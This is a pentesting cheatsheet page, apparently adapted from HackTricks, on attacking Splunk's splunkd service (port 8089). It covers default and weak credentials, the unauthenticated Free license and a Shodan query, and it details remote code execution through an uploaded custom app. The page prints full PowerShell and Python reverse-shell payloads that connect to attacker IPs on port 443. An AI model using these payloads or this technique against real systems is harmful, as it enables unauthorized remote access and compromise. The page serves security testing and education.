daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

8089-splunkd.md (5992B)


      1 ---
      2 title: "8089 - Pentesting Splunkd"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/8089-splunkd.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/8089-splunkd.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 8089 - Pentesting Splunkd
     14 
     15 ## **Basic Information**
     16 
     17 - Log analytics tool used for data gathering, analysis, and visualization
     18 - Commonly used in security monitoring and business analytics
     19 - Default ports:
     20   - Web server: 8000
     21   - Splunkd service: 8089
     22 
     23 ### Vulnerability Vectors:
     24 
     25 1. Free Version Exploitation
     26 
     27 - Historical Splunk Enterprise trials could switch to a limited Free license after expiry; licensing and conversion behavior varies by release.
     28 - The Free license historically disabled authentication, so verify the active license and current product documentation instead of assuming every port 8089 service is unauthenticated.<sup>[[2]](#references)</sup>
     29 - Potential security risk if left unmanaged
     30 - Administrators may overlook security implications
     31 
     32 2. Credential Weaknesses
     33 
     34 - Older releases used default credentials such as `admin:changeme`; current installations require an administrator password during setup.
     35 - Newer versions: Credentials set during installation
     36 - Potential for weak password use (e.g., `admin`, `Welcome`, `Password123`)
     37 
     38 3. Remote Code Execution Opportunities
     39 
     40 - Multiple code execution methods:
     41   - Server-side Django applications
     42   - REST endpoints
     43   - Scripted inputs
     44   - Alerting scripts
     45 - Cross-platform support (Windows/Linux)
     46 - Scripted inputs can run:
     47   - Bash scripts
     48   - PowerShell scripts
     49   - Batch scripts
     50 
     51 Key Exploitation Potential:
     52 
     53 - Sensitive data storage
     54 - Lack of authentication in free version
     55 - Multiple vectors for potential remote code execution
     56 - Possibility of leveraging scripted inputs for system compromise
     57 
     58 ### Shodan
     59 
     60 - `Splunk build`
     61 
     62 ## RCE
     63 
     64 ### Create Custom Application
     65 
     66 Splunk offers a sophisticated method for remote code execution through custom application deployment, leveraging its cross-platform scripting capabilities. The core exploitation technique revolves around creating a malicious application that can execute reverse shells on both Windows and Linux systems.<sup>[[1]](#references)</sup>
     67 
     68 A custom application can define scripted inputs in supported interpreters such as shell, PowerShell, batch, or the Python runtime shipped with the applicable Splunk release. Interpreter availability and Python version are release/platform specific.<sup>[[3]](#references)</sup>
     69 
     70 The `reverse_shell_splunk` example app includes a Python payload (`bin/rev.py`) and PowerShell launcher (`bin/run.ps1`); the direct file references are retained because they clarify the expected app layout. Use them only in an authorized lab or create a benign proof-of-execution app.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
     71 
     72 The exploitation process follows a consistent methodology across platforms:
     73 
     74 ```text
     75 splunk_shell/
     76 ├── bin        (reverse shell scripts)
     77 └── default    (inputs.conf configuration)
     78 ```
     79 
     80 The critical configuration file `inputs.conf` enables the script by:
     81 
     82 - Setting `disabled = 0`
     83 - Configuring a 10-second execution interval
     84 - Defining the script's source type
     85 
     86 Deployment requires an account permitted to install apps (or filesystem access to an app directory), and the script runs with the OS privileges of the Splunk service account. It is not an unauthenticated primitive by itself.<sup>[[3]](#references)[[4]](#references)</sup>
     87 
     88 1. Create the malicious application package
     89 2. Set up a listener (Netcat/socat) on the attacking machine
     90 3. Upload the application through Splunk's interface
     91 4. Trigger automatic script execution upon upload
     92 
     93 Sample Windows PowerShell reverse shell:
     94 
     95 ```bash
     96 $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
     97 $stream = $client.GetStream();
     98 [byte[]]$bytes = 0..65535|%{0};
     99 while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    100   $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    101   $sendback = (iex $data 2>&1 | Out-String );
    102   $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    103   $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    104   $stream.Write($sendbyte,0,$sendbyte.Length);
    105   $stream.Flush()
    106 };
    107 $client.Close()
    108 ```
    109 
    110 Sample Linux Python reverse shell:
    111 
    112 ```python
    113 import sys, socket, os, pty
    114 ip = "10.10.14.15"
    115 port = "443"
    116 s = socket.socket()
    117 s.connect((ip, int(port)))
    118 [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
    119 pty.spawn('/bin/bash')
    120 ```
    121 
    122 ### RCE & Privilege Escalation
    123 
    124 In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:
    125 
    126 
    127 [Splunk Lpe And Persistence](/hacktricks/linux-hardening/software-information/splunk-lpe-and-persistence)
    128 
    129 ## References
    130 
    131 - [1] [Attacking Splunk - RCE via custom application (HTB Academy)](https://academy.hackthebox.com/module/113/section/1213)
    132 - [2] [Splunk — Types of Splunk software licenses](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/9.4/configure-splunk-licenses/types-of-splunk-software-licenses)
    133 - [3] [Splunk Developer — Scripted input examples](https://dev.splunk.com/enterprise/docs/developapps/inputdatatypes/scriptedinputs/)
    134 - [4] [Splunk — Install apps from a package](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/9.4/manage-apps-and-add-ons/install-apps-and-add-ons-from-an-installation-package)
    135 - [5] [0xjpuff/reverse_shell_splunk](https://github.com/0xjpuff/reverse_shell_splunk)
    136 - [6] [`reverse_shell_splunk/bin/rev.py`](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py)
    137 - [7] [`reverse_shell_splunk/bin/run.ps1`](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1)